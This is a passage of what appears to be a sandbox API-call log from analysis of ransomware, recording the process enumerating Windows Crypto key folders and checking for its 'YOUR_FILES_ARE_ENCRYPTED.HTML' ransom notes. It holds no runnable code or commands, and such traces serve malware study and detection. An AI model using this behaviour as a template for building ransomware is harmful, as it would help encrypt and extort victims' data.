Users\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*" [0169.786] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.786] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.787] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.787] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.787] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.787] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c 
| out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.787] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.787] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.787] GetProcessHeap () returned 0x270000 [0169.788] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.788] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.788] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.788] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.788] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.788] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.788] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.789] GetProcessHeap () returned 0x270000 [0169.789] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.789] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="Keys", cAlternateFileName="")) returned 1 [0169.789] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned 44 [0169.789] GetProcessHeap () returned 0x270000 [0169.789] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.789] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" [0169.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*" [0169.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.790] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.790] FindNextFileW (in: hFindFile=0x42f31c0, 
lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.790] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0169.790] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.790] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.790] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.790] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0169.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 
returned 0xffffffff [0169.790] GetProcessHeap () returned 0x270000 [0169.791] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.791] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 1 [0169.791] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned 43 [0169.791] GetProcessHeap () returned 0x270000 [0169.791] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.791] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" [0169.791] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*" [0169.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", 
cAlternateFileName="")) returned 0x42f31c0 [0169.791] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.791] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0169.792] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 55 [0169.792] GetProcessHeap () returned 0x270000 [0169.792] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.792] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" [0169.792] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*" [0169.792] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.792] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.792] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.792] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.792] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.792] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c 
| out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.792] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.792] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.792] GetProcessHeap () returned 0x270000 [0169.793] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.793] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba5b4a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.793] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.793] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.793] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba5b4a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.793] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.793] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.794] GetProcessHeap () returned 0x270000 [0169.794] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.794] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba5b4a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.794] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0169.794] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.794] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba5b4a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.794] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.794] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0169.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.795] GetProcessHeap () returned 0x270000 [0169.795] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.795] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0169.795] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned 45 [0169.795] GetProcessHeap () returned 0x270000 [0169.795] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.796] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage" [0169.796] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*" [0169.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.796] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, 